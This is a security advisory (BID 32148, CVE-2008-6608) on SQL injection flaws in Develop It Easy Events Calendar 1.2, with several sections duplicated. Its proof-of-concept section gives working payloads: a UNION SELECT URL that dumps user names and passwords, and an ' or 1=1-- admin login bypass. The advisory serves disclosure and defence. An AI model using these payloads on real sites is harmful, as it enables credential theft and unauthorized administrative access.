Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
BID:32148
Info
Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 32148 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6608 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 06 2008 12:00AM |
| Updated: | Apr 16 2009 09:46PM |
| Credit: | Cyb3r-1sT |
| Vulnerable: |
Develop It Easy Events Calendar 1.2 |
| Not Vulnerable: | |
Discussion
Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
Develop It Easy Event Calendar is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Event Calendar 1.2 is vulnerable; other versions may also be affected.
Develop It Easy Event Calendar is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Event Calendar 1.2 is vulnerable; other versions may also be affected.
Exploit / POC
Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proofs of concept are available:
http://www.example.com/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
http://www.example.com/admin/index.php
user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
An attacker can exploit these issues via a browser.
The following proofs of concept are available:
http://www.example.com/calendar_details.php?id=-26+union+select+0,0,concat(user_name,0x3a,user_pass),0,0,0,0,0,0,0+from+login--
http://www.example.com/admin/index.php
user : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
pass : cyb3r-1st ' or ' 1=1-- ( or u can use ' or 1=1-- )
Solution / Fix
Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Develop It Easy Event Calendar Multiple SQL Injection Vulnerabilities
References:
References:
- Events Calendar Homepage (Develop It Easy)